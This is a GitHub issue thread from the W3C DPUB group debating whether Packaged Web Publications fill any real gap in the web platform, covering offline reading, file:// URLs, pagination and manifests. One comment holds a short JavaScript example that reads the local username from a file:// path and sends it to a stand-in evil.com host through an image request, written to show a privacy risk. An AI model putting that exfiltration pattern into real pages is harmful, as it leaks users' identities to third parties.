w3c / dpub-pwp

Repository of the W3C DPUB IG on the (Packaged) Web Publications work

Spec doesn't justify its raison d'être #21

Closed marcoscaceres closed 8 years ago

marcoscaceres commented 8 years ago

A naive reading of the spec doesn't really give a true raison d'être for its existence. The spec is a little hand-wavy about required resources and fonts, etc. but it doesn't prove that current web technologies don't already do everything described.

What would be great would be more clarity about that. That is, a really clear, technical proof that "today, the Web cannot do books" - why this spec is really needed. It seems like DRM would be the only thing (?), as I'm having a hard time thinking of what can't be built today using Web tech with regards to "books" on the Web - and hypermedia in general, which the Web is pretty good at.

Let's frame this differently: let's say you came to Mozilla, Google, or Apple and asked them to implement the spec. What would you want the browser to do differently and why? And how would that be different to "web apps"?

As a web developer, I can already do offline with Service Workers, etc. The fonts issue can also be handled through the fonts API and through the Cache API, and fetching is handled by the Fetch spec. And so on... the merging of data is trivial too (e.g., Object.assign({}, JSON.parse(a), JSON.parse(b))). So, it would be great to identify the actual gaps that the spec is trying to standardize.
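To make the merging point concrete, here is a minimal sketch of that one-liner in action (the keys and values are invented purely for illustration):

```javascript
// Merging two JSON documents with Object.assign: later sources win on key clashes.
// "a" and "b" are hypothetical manifest fragments, not any real PWP format.
const a = '{"title": "My Book", "lang": "en"}';
const b = '{"lang": "fr", "author": "Jane Doe"}';

const merged = Object.assign({}, JSON.parse(a), JSON.parse(b));
console.log(merged.title);  // "My Book"
console.log(merged.lang);   // "fr" — b overrides a
console.log(merged.author); // "Jane Doe"
```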

It might be that the Web provides all of what is needed already? It'd be really cool to do a rundown and see what is missing.

marcoscaceres commented 8 years ago

Apologies if the above sounds negative - that's not intentional! As someone who works for a browser maker, I'm extremely interested in finding deficiencies in the web platform and fixing them!

mac2net commented 8 years ago

Hi Marco,

Fonts can be encoded and embedded right now. What "we" need from browsers is auto-decompression of something like ".pwp", a compressed HTML PWP file. Check out my working PWP:

Original: http://www.w3.org/2016/09/TPAC/
Online sample: http://samples.5doc.org/content/w3c-tpac-2016/

Click the red "5" to create, on the fly, a download and offline version including an embedded copy of the font League Gothic.

Cheers, Mike

marcoscaceres commented 8 years ago

@mac2net, getting 404 on those links?

marcoscaceres commented 8 years ago

@mac2net, but there is a presupposition that you need a package of some sort (.pwp).

Why do you need the package at all? What's wrong with just serving content over HTTP + given all the good stuff in HTTP/2 (like pushing resources to the client, etc.) and all the compression and performance you get?

iherman commented 8 years ago

On 23 Jun 2016, at 12:00, Marcos Cáceres notifications@github.com wrote:

[…]

We fully agree with the criticism (which, reflecting on your other comment, I consider a friendly one!). Earlier versions (e.g., the official draft) did include use cases, but we decided that this is not the right place; the main emphasis of the IG at this moment is to make a proper, separate UCR document (an early draft is in another repo). We hope to come up with a much more consistent version in early autumn; this document is a bit on hold until then.

As for the other question: I am not sure there is anything browsers should do differently. For the time being, I believe PWP will be implementable via a complex web app, just as there are EPUB3 readers available today. In other words, it is meant to be a standard for specific types of resources on the Web that can be rendered, if so chosen, on top of current browsers; it may not need to be part of the Web runtime. In the longer term, some issues may come to the fore where efficiency would be increased if browsers did something special, but that is for later.

Well, there is one thing needed to make this viable: the role of Service Workers is essential, so we hope all browsers will have them eventually. But, AFAIK, that is well on its way.

Thanks again for your interest!

mac2net commented 8 years ago

Sorry, my Markdown fell down... Original / Sample: click on the red "5" to download an offline version.

Regarding your question: for online, nothing is wrong. For offline: the 5DOC HTML format works fine, but compression would yield a smaller file than a PDF of the same web page, and it looks a lot better.

marcoscaceres commented 8 years ago

Wanted to drop this here as an example of web app that is a book: https://hpbn.co/

mac2net commented 8 years ago

Thanks. I actually prepared something similar for offline. Didn't finish the ReadMe yet but the content works. I adopted the W3C SVG2 specs for offline use.

If you've seen the latest PWP drafts/meeting logs you will know the current thinking seems to be quite complex, for example the proposed manifest.

The 5DOC sample on Github shows my simple idea of a director file at the top level of a compressed container, called .pwpaccess.

I offered an example for the SVG2 spec container (similar to the HPBN book):

{"mimetype": "application/pwp+zip", "index": "/SVG2/Overview.html", "index-type": "text/html"}

Other index-types could be developed as needed, but in the meantime just this would kick start the use of offline HTML.

I suggest the following browser logic:

  1. Is the PWP file actually a ZIP? No: die. Yes: continue.
  2. If the PWP file contains just one HTML file, cache and open it.
  3. If it contains a .pwpaccess file, process it by index and index-type.

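The three-step logic above could be sketched as a small routing function. Everything here (the function name, the entry-reading callback, the `.pwpaccess` shape) follows Mike's proposal and is hypothetical, not part of any PWP draft:

```javascript
// Hypothetical sketch of the proposed three-step browser logic.
// entryNames: names of entries in the (assumed ZIP-based) container.
// readEntry: callback that returns an entry's text content.
function routePwp(entryNames, readEntry) {
  const htmlFiles = entryNames.filter(n => n.toLowerCase().endsWith(".html"));

  // Step 3: a .pwpaccess director file, if present, says what to open.
  if (entryNames.includes(".pwpaccess")) {
    const access = JSON.parse(readEntry(".pwpaccess"));
    return { action: "open", index: access.index, type: access["index-type"] };
  }
  // Step 2: exactly one HTML file -> cache and open it.
  if (htmlFiles.length === 1) {
    return { action: "open", index: htmlFiles[0], type: "text/html" };
  }
  // Step 1's failure branch ("not actually a ZIP") is assumed handled earlier.
  return { action: "reject" };
}
```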
TzviyaSiegman commented 8 years ago

Thank you @marcoscaceres

@mac2net, please remember that PWP is in the use-case stage. We have not defined a packaging mechanism or a manifest mechanism. Please don't draw conclusions about specifics, such as whether ZIP is the format we will use. There is no PWP draft, only use cases and a vision statement. There is no proposed manifest at this point, just discussion.

mac2net commented 8 years ago

I'm suggesting for PWP - as there is widespread recognition that current web technologies are more than satisfactory - that development mirror the incremental, iterative Web approach rather than the all-or-nothing EPUB approach.

marcoscaceres commented 8 years ago

@mac2net, to echo @TzviyaSiegman's comments: it's too early to be presenting any alternatives. The current web model has not proven itself deficient. You seem to be presupposing a deficiency in the web platform, which needs to be proved beyond a reasonable doubt (i.e., it must demonstrably fail to satisfy some set of use cases - and to date, we are still trying to figure out what those are, if any).

I would expect to see a list like:

Here are detailed examples of what I mean:

I would expect something similar, to prove deficiency in the platform.

mac2net commented 8 years ago

Thanks @marcoscaceres for the explanation. I will try to better understand this process.

Regarding point 1) - "it does not do X, and users demonstrably need X", I think that the existential necessity of the PWP effort is very strong evidence that this is indeed true according to the judgement of the W3C.

Portable Web Publications achieve full convergence between online and offline/portable document publishing: publishers and users won't need to choose one or the other, but can switch between them dynamically, at will.

I feel it's important to distinguish between what's achievable (0-3 years) and what's aspirational (3+ years), and the level of human need and effort justifies devoting a certain share of the focus to the achievable.

marcoscaceres commented 8 years ago

Regarding point 1) - "it does not do X, and users demonstrably need X", I think that the existential necessity of the PWP effort is very strong evidence that this is indeed true according to the judgement of the W3C.

Consider that I would have to go and pitch this to Mozilla's or Google's or Apple's web engineering team: they would, as I'm asking you, like to see hard proof that the Web can't do whatever you need it to do.

If I walked in and claimed "existential necessity" based on some random group's existence at some random standards body, I don't think I would get very far. The W3C spins up groups all the time - and most of those groups fail to produce anything of value (failing fast/hard is a good thing). Being part of the W3C doesn't automatically give a group credibility - a group earns that by making a convincing case! Mere existence doesn't serve as evidence of need - it may just reflect a lack of awareness that the web can already do what needs to be done (which is the position I am arguing).

So, let me frame this differently: how are the use cases not solved with Service Workers, IDB, Cache API, etc.? The burden of proof, unfortunately, falls on you to prove that the Web "can't do books" - whatever that may mean.

mac2net commented 8 years ago

Thanks again @marcoscaceres. The background information about W3C processes is very helpful. I spent a few hours yesterday studying where responsibilities for the technical aspects lie. I also just reviewed the use cases.

5DOC is not using the same approach as PWP. One can read online, or download and read offline via a file:/// local URL. The Use Cases and Requirements document hasn't described the process for accessing an offline PWP yet.

From what I understand, the existing technologies are glorified caches, not permanent file-system storage. Downloading and storing a PWP in iCloud and accessing it from a variety of devices for later offline use is not a use case. There is no disclosure of what the PWP offline protocol would be. Unless I missed something.

I have created many 5DOC samples that show this idea. This is the 5DOC representation of the PWP spec. Click the red "5" to download and read offline via file:///. The only difference is that I removed Respec.

marcoscaceres commented 8 years ago

I spent a few hours yesterday studying where responsibilities for the technical aspects lie. I also just reviewed the use cases.

That's great to hear.

read offline via file:///localUrl

There are serious limitations around using file://: namely, it's incompatible with the Web's same-origin policy - so basically, fetching/XHR breaks, as do other security checks. It's not viable to use file://. It also has the potential to leak privacy-sensitive information: for example, if I were to save a file onto my HD and open it, it would expose my username:

"/Users/marcos/Downloads/some.file"

An attacker could then simply take window.location, extract my username, and send it back to a server:

// e.g., window.location.pathname === "/Users/marcos/Downloads/some.file"
var username = window.location.pathname.split("/")[2];
var image = new Image();
image.src = "http://evil.com/?user=" + encodeURIComponent(username);
document.body.appendChild(image);

From what I understand, the existing technologies are glorified caches, not permanent file system storage.

You are correct. We are working on fixing that tho: https://storage.spec.whatwg.org/#dom-storagemanager-persist

This is the 5DOC representation

Thanks for the link. Before we go there tho, we need to work out whether Persistent Storage (above) is insufficient.

As an aside: can I kindly ask that you not use the W3C Editor's Draft style and W3C logo for unofficial documents? This can confuse people into thinking that the W3C membership has some level of consensus around the proposal. Please switch to "unofficial".

mac2net commented 8 years ago

Let me review your technical points. Regarding the reproduction of the W3C page: I have read the W3C Document License and thought the 5DOC representation followed the guidelines. At the moment this document is unreleased - there is no incoming link from the 5DOC home page or anywhere else on the site - and when it is released I always make it clear where the document originated and provide a link to it.

marcoscaceres commented 8 years ago

Ok, but please do consider changing to "unofficial". From experience, these documents have a habit of getting shared around (e.g., via email, twitter, etc.), and people don't read the status sections - so it can easily lead to confusion.

mac2net commented 8 years ago

Just to clarify: first, I wanted to make sure I didn't misunderstand the W3C license, because I don't want to violate any rules/laws. I am happy to add some kind of distinguishing label so it is clear to the user. For a released 5DOC, the contents of the modal explain this, but I will put something on the actual content page as well.

mac2net commented 8 years ago

Regarding file:///, I can't find any reference showing that it presents additional risk over a conventional URL. Or are you saying that the security policy could break the page if there is a fetch/XHR? Why would exposing my local path be any more dangerous than exposing, for example, my GitHub path https://github.com/mac2net?

marcoscaceres commented 8 years ago

Regarding file:///, I can't find any reference that it presents any additional risk over a conventional url.

For instance: https://tools.ietf.org/html/draft-ietf-appsawg-file-scheme-11#section-5

In the example, I also showed how you could steal someone's username on Unix-based systems pretty trivially.

Or are you saying that the security policy could break the page if there is a "fetch/xhr"?

Correct. See "file": https://fetch.spec.whatwg.org/#basic-fetch

Why would exposing my local path be any more dangerous than exposing for example my github path https://github.com/mac2net?

Because the file system is supposed to be private (information about it is not supposed to leak outwards) - using file:// circumvents this by exposing that information.

Let's say you wanted to target sysadmins at company X with a "book attack": you might get them to download your book, and then ping back the username of everyone who opens it. This could be used, for instance, to blackmail someone ("you opened the Pr0n book - we have proof and we are going to tell your boss"). This is different from visiting a website anonymously, where an attacker can't get direct proof of who the person is. And with the username for a user's computer in hand, an attacker could also just start brute-forcing the password.

Re GitHub: it is a public host. If you don't sign in to GitHub, you don't expose your username - only an IP address.

mac2net commented 8 years ago

Having a browser's security policy break a fetch/XHR in what is supposed to be an offline doc is a good thing. JavaScript-triggered dynamic data sets are an edge case for offline docs.

Regarding the IETF doc, I already saw this document and I am reviewing it again. It is very vague and the linked documents are also vague.

With respect to the "same origin policy", don't default browser settings enforce this?

I searched Apple for this stuff and the only thing I found was that Safari requires one to manually disable protections. I also saw other browsers have similar restrictions.

Also, wouldn't any of the cache type storage techniques also present new and perhaps yet unidentified security risks?

marcoscaceres commented 8 years ago

On 14 Jul 2016, at 7:24 PM, Mike - 5DOC notifications@github.com wrote:

Having a browser's security policy break a fetch/XHR in what is supposed to be an offline doc is a good thing. JavaScript-triggered dynamic data sets are an edge case for offline docs.

That's not necessarily true. Again, see Service Workers. They are specifically designed to cover this case.

Regarding the IETF doc, I already saw this document and I am reviewing it again. It is very vague and the linked documents are also vague.

Yes, no one wants to deal with file:// :) But in all seriousness, basing anything on file:// is a nonstarter from an implementer's perspective.

With respect to the "same origin policy", don't default browser settings enforce this?

In as far as things break, then yes.

I searched Apple for this stuff and the only thing I found was that Safari requires one to manually disable protections. I also saw other browsers have similar restrictions.

Sure.

Also, wouldn't any of the cache type storage techniques also present new and perhaps yet unidentified security risks?

Absolutely. But they are not inherent to interoperability: those would be things we would fix, not part of the design (unlike file://, which is broken by design).

mac2net commented 8 years ago

I will keep researching this.

Regarding data sets: for 5DOC they are an edge case. I don't know enough to comment on their applicability with Service Workers.

I do think - going back to your point that many W3C group initiatives fail - that DIGIPUB-IG should consider this when basing PWP on as-yet-unproven technologies.

File URLs may be considered the dodo bird of the browser - I live in the Netherlands, which still has guilt feelings over the dodo's extinction - but HTML docs and HTML containers loaded this way work really well, and typical browser settings are in place to protect against breaches.

Perhaps your concerns are a great argument in support of the PWP compressed file type, which could include some kind of validation as a step in processing these documents.

marcoscaceres commented 8 years ago

Perhaps your concerns are a great argument in support of the pwp compressed file type which could include some kind of validation as a step in processing these documents.

We tried that with Firefox OS, for instance - and we tried it at the W3C and other consortia (BONDI, JIL, WAC, etc.). Others have tried the packaged-web-app thing too: they all failed spectacularly (remember, I wrote the original "Packaged Web Apps" spec [1] and made numerous attempts to solve the file:// issue [2][3] - and tried to solve the security problems [4][5]). The bottom line is, "don't fight the Web". The web is really good at doing documents and navigating documents. Where it is not, we should incrementally fix it. Trying to come up with new security models to work around perceived limitations hasn't gotten very far in the past.

[1] https://www.w3.org/TR/widgets/
[2] https://www.w3.org/TR/widgets-uri/
[3] https://www.w3.org/TR/app-uri/
[4] https://www.w3.org/TR/widgets-digsig/
[5] https://www.w3.org/TR/widgets-access/

mac2net commented 8 years ago

Thanks, I will review these too!

It took some very smart people over 40 years to make a successful vertical launch plane and it will be a full century before the F-35 goes mainstream.

Things are always changing. I remember thinking Apple's OpenDoc was great back in the early 90s. While it failed, its ancestors are in wide use today.

I am approaching this from the user's perspective. The screen reader is a failure in the way that a VW Beetle was a failure - very successful for a limited time when a limited vision of transport dominated.

SRs bifurcated the market through their limitations and incompatibilities. And while its popularity shows that there is a lot right about PDF, it is based on the physical page, not a web page.

IMO content originated in HTML - and HTML's % of the total pie is growing rapidly - should be consumed offline in the same way as online. So maybe it's time for another shot at it.

I remember after going into a DTP business back in '86 with the Apple LaserWriter Plus, so many folks would explain to me what was wrong with the technology and why it would never work.

I guess I enjoy working on the edge of technology rather than with the masses.

juicejuice commented 8 years ago

From the user perspective, absolutely there is a need for this. I would venture that the primary PDF use-case for a lot of people is to capture and store a copy of an information set at a point in time. This is then either printed or downloaded.

It's unclear to me how important a fully downloaded web app is, as opposed to just static content, but I definitely see the use case for static content. EPUB goes part of the way, but the fact you can't just "print to EPUB" from most environments, coupled with a general lack of out-of-the-box EPUB readers on various platforms, means its usage is not as widespread as it could (should?) be.

I think the popularity of web snippet tools gives a good pointer to how people would like to interact with offline web content and form their own content libraries.

mac2net commented 8 years ago

The reference documents are very helpful.

The bottom line is, "don't fight the Web". The web is really good at doing documents, and navigating documents.

5DOC is very document focused - it's in the name after all. I want it to be clear it is NOT an app. It is content.

Perhaps a laser focus on the offline document as just that would enable overcoming the obstacles encountered with these other initiatives.

juicejuice commented 8 years ago

Perhaps a laser focus on the offline document

+1

TzviyaSiegman commented 8 years ago

5DOC is not using the same approach as PWP.

@mac2net if 5DOC is not using the same approach as PWP, why is this being discussed here? As I've said numerous times, PWP is not yet a spec and does not outline an approach. It is a vision and an incomplete set of use cases. Please limit the discussion to issues about PWP. Please do not use this forum to advertise your services. @marcoscaceres has offered technical critique. Please continue along those lines.

mac2net commented 8 years ago

I am not advertising my services. If you think I have, please provide the relevant quote so that I can correct my statement or delete that part of my comment.

dauwhe commented 8 years ago

@marcoscaceres wrote:

Wanted to drop this here as an example of web app that is a book: https://hpbn.co/

This is a great example. I can think of several ways this doesn't meet my expectations for a book:

  • The main page has no schema.org metadata.
  • Searching for something in the book would mean going to Google and doing term site:hpbn.co.
  • I am unable to highlight a passage or make notes (at least until web annotations come along!).
  • My options to customize the reading experience are limited.

Some of the above issues could be addressed with different markup or more JavaScript. But what I see as the fundamental problem is that it's too much cognitive work to read long-form content like this. As a thought experiment, consider how many events would be sent to the browser while reading this entire book--there would likely be thousands of scroll events, in addition to all the link-clicking to get from chapter to chapter.

In a paginated ebook reader, a single UI gesture—a swipe or a click—would get me through the whole book, regardless of how the HTML is organized. This is reading without distraction, where I can focus on the content rather than the interface. This is what's different about books: I read, I turn the page, and that's all I need to do.

Note: Firefox can do something like this now without pagination, if there is rel=next; the spacebar will get you everywhere you need to go.

From the web perspective, that means three things to me:

  1. Some way of defining that a group of web resources are part of a single whole, and being able to talk about the whole. Having a list in a web app manifest would be a nice way of telling a service worker what to cache for offline reading.
  2. Being able to define a default ordering of web resources. nav can do this, or it's another easy thing to do in some sort of JSON manifest.
  3. Pagination. Three lines of CSS can do a nice job of this in desktop Safari (overflow: -webkit-paged-x plus scroll snapping). It's fun reading books in Presto. Again, this can be scripted, but I personally think this is such a useful UI paradigm that it should be baked into the browsers.

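Point 1 above can be sketched in code. Note that the `resources` member and the function name below are invented purely to illustrate the idea; no such manifest member is standardized:

```javascript
// Hypothetical sketch: a manifest-like object listing the resources that make
// up one publication, resolved into absolute URLs a service worker could cache.
// The "resources" member is NOT part of the Web App Manifest spec.
function resourcesToCache(manifest, baseUrl) {
  return (manifest.resources || []).map(r => new URL(r, baseUrl).href);
}

// In a service worker (browser-only, shown as a comment), one might then do:
// self.addEventListener("install", e => e.waitUntil(
//   caches.open("book-v1").then(c => c.addAll(list))));
```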
marcoscaceres commented 8 years ago

@dauwhe, this is exactly the kind of feedback I was looking for - real use cases + real limitations 💃. Thank you! Let me chew on that for a few days.

marcoscaceres commented 8 years ago

Quick note/thoughts... could not help myself 😄:

"The main page has no schema.org metadata."

Don't get hung up on existing solutions - there are many ways to assert "this is a book" so that the user agent treats it as one (which is really what we want here: the browser should present this in a special way, providing the UX/UI affordances typical of a good reading experience). I would love to see a document like the NetInfo use cases showing various UIs from e-readers, etc., and how they solve these problems - distilling what makes the reading experience great on Kindle, for example.

  • Searching for something in the book would mean going to Google and doing term site:hpbn.co.

I like this! I wonder how we could do in-page search using the Cache API, or whether we need a Search API for the cache that searches parsed markup for full text.

I am unable to highlight a passage or make notes (at least until web annotations come along!)

Need to re-read that spec... but I wonder whether that can't already be done by implementing Web Annotations in JS.

My options to customize the reading experience are limited.

This is really related to 1. But I agree - everything you suggest here is awesome. If we could just say "book mode!" (like Reading mode in Safari, Opera, etc.) it would solve a lot of issues and just let the browser provide a great UI/UX for night mode, for setting the font, etc.

As a thought experiment, consider how many events would be sent to the browser while reading this entire book--there would likely be thousands of scroll events, in addition to all the link-clicking to get from chapter to chapter.

I find this quite subjective - it seems to take a romantic view of textual reading (I can imagine wonderfully interactive books or games). Literary experiences come in many forms, and may well depend on all those events. Having said that, EventListenerOptions mitigates some redundant events - at least for scrolling: https://github.com/WICG/EventListenerOptions

Some way of defining that a group of web resources are part of a single whole, and being able to talk about the whole. Having a list in a web app manifest would be a nice way of telling a service worker what to cache for offline reading.

Maybe manifest scope? https://w3c.github.io/manifest/#scope-member

Apologies for the lack of example there... but basically groups a set of URLs to say they are part of a whole.
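A minimal sketch of what that could look like (the URLs and name are invented; `scope` is a real Web App Manifest member, though applying it to publications this way is speculative):

```json
{
  "name": "Example Book",
  "start_url": "/book/index.html",
  "scope": "/book/"
}
```

Here every URL under /book/ would be treated as part of the same whole.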

Pagination. Three lines of CSS can do a nice job of this in desktop Safari (overflow: -webkit-paged-x plus scroll snapping). It's fun reading books in Presto. Again, this can be scripted, but I personally think this is such a useful UI paradigm that it should be baked into the browsers.

Certainly something worth exploring further.

marcoscaceres commented 8 years ago

Fixed quoted text above...

TzviyaSiegman commented 8 years ago

@marcoscaceres Thanks for the feedback. DPUB is documenting use cases and requirements for PWP: http://w3c.github.io/dpub-pwp-ucr/. This is very much a work in progress at this point, but it should give you significantly more to chew on. @dauwhe's comments are spot on.

marcoscaceres commented 8 years ago

@TzviyaSiegman thanks for the link. Will have a read.

Anyway, this has been quite informative in helping me understand what is being proposed/discussed. Closing this for now.